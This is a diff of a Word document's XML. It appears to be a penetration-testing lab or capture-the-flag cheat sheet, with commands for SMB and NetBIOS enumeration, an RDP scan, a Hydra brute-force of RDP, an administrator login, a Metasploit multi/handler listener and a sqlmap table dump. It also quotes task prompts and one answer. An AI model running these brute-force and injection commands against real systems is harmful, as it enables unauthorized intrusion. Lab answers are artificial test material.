-        <w:t>--script-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>args</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>smbusername</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=&lt;user</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>&gt;,</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>smbpassword</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>=&lt;pass&gt; &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict>
-          <v:rect id="_x0000_i1113" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>🧾</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 4. NETBIOS ENUMERATION</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sV</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> --script </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nbstat.nse</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nbtstat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -A &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-        </w:rPr>
-        <w:t>👉</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Gives:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Hostname</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Domain name</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict>
-          <v:rect id="_x0000_i1114" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>🔐</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 5. RDP ATTACK / ENUMERATION</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>🔍</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Scan RDP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -p 3389 &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict>
-          <v:rect id="_x0000_i1115" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>🧠</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Metasploit RDP Scanner</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>msfconsole</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -q</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t xml:space="preserve">search </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>rdp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:br/>
-        <w:t>use auxiliary/scanner/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>rdp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>rdp_scanner</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:br/>
-        <w:t>set RHOSTS &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>set RPORT 3333   # if custom port</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>run</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict>
-          <v:rect id="_x0000_i1116" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>🔑</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Bruteforce</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> RDP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>hydra -L users.txt -P rockyou.txt rdp://&lt;ip&gt; -s 3333</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict>
-          <v:rect id="_x0000_i1117" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>🖥️</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Login RDP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>xfreerdp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>u:administrator</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>p:password</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> /v:&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;:3333</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:pict>
-          <v:rect id="_x0000_i1118" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2329,7 +2329,7 @@
     <w:p>
       <w:r>
         <w:pict>
-          <v:rect id="_x0000_i1119" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -2421,7 +2421,7 @@
     <w:p>
       <w:r>
         <w:pict>
-          <v:rect id="_x0000_i1120" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -2493,7 +2493,7 @@
     <w:p>
       <w:r>
         <w:pict>
-          <v:rect id="_x0000_i1121" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -2590,7 +2590,7 @@
     <w:p>
       <w:r>
         <w:pict>
-          <v:rect id="_x0000_i1122" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -2893,7 +2893,7 @@
     <w:p>
       <w:r>
         <w:pict>
-          <v:rect id="_x0000_i1143" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -3495,7 +3495,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>use multi/handler</w:t>
+        <w:t xml:space="preserve">use </w:t>
+      </w:r>
+      <w:r>
+        <w:t>exploit/</w:t>
+      </w:r>
+      <w:r>
+        <w:t>multi/handler</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3989,7 +3995,7 @@
     <w:p>
       <w:r>
         <w:pict>
-          <v:rect id="_x0000_i1211" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -4234,7 +4240,7 @@
     <w:p>
       <w:r>
         <w:pict>
-          <v:rect id="_x0000_i1212" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -4280,7 +4286,7 @@
     <w:p>
       <w:r>
         <w:pict>
-          <v:rect id="_x0000_i1213" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -4411,7 +4417,7 @@
     <w:p>
       <w:r>
         <w:pict>
-          <v:rect id="_x0000_i1214" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -4546,7 +4552,7 @@
     <w:p>
       <w:r>
         <w:pict>
-          <v:rect id="_x0000_i1215" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -4628,7 +4634,7 @@
     <w:p>
       <w:r>
         <w:pict>
-          <v:rect id="_x0000_i1216" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -4808,7 +4814,7 @@
     <w:p>
       <w:r>
         <w:pict>
-          <v:rect id="_x0000_i1217" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -5012,7 +5018,7 @@
     <w:p>
       <w:r>
         <w:pict>
-          <v:rect id="_x0000_i1218" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -5246,7 +5252,7 @@
     <w:p>
       <w:r>
         <w:pict>
-          <v:rect id="_x0000_i1219" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -5415,7 +5421,7 @@
     <w:p>
       <w:r>
         <w:pict>
-          <v:rect id="_x0000_i1220" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -5470,7 +5476,7 @@
     <w:p>
       <w:r>
         <w:pict>
-          <v:rect id="_x0000_i1221" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -5678,10 +5684,2870 @@
         <w:t>Answer: 6952</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>curl http:// | grep -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> “author”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Your specific task is to identify the attack category of the oldest Common Vulnerabilities and Exposures (CVEs) affected the website. (Format: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>aaaaa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>*</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>aaaa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>aaaaaaaaaa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (AAA</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>) )</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">-In terminal: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>zaproxy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Use </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Owasp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> zap or open vas </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Your primary task is to identify the type of security policies is missing to detect and mitigate Cross-Site Scripting (XSS) and SQL Injection attacks. (Format: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Aaaaaaa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Aaaaaaaa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Aaaaaa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Run </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Atomated</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> scan with OWASP ZAP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="59636E"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># List Tables, add </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="59636E"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>databse</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="59636E"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> name</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>sqlmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -u </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="0A3069"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"http://domain.com/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="0A3069"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
